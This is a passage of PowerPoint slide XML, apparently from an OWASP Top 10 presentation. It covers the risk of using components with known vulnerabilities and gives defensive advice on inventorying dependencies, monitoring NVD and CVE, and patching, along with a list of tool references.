              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The challenge is to continuously monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client-side and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server-side)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you are using for new vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vague.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId8"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Dependency Check (for Java and .NET libraries)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Virtual Patching Best Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId8"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Unfortunate Reality of Insecure Libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>MITRE Common Vulnerabilities and Exposures (CVE) search</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Retire.js for d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>etecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>nown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ulnerable JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>libraries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most component projects do not create vulnerability patches for old versions. So the only way to fix the problem is to upgrade to the next version, which can require other code changes. Software projects should have a process in place to:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for vulnerabilities in your components. Use software composition analysis tools to automate the process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analyze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libraries to be sure they are actually invoked at runtime before making changes, as the majority of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>components are never loaded or invoked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decide whether to upgrade component (and rewrite application to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>match if needed) or deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that analyzes HTTP traffic, data flow, or code execution and prevents vulnerabilities from being exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
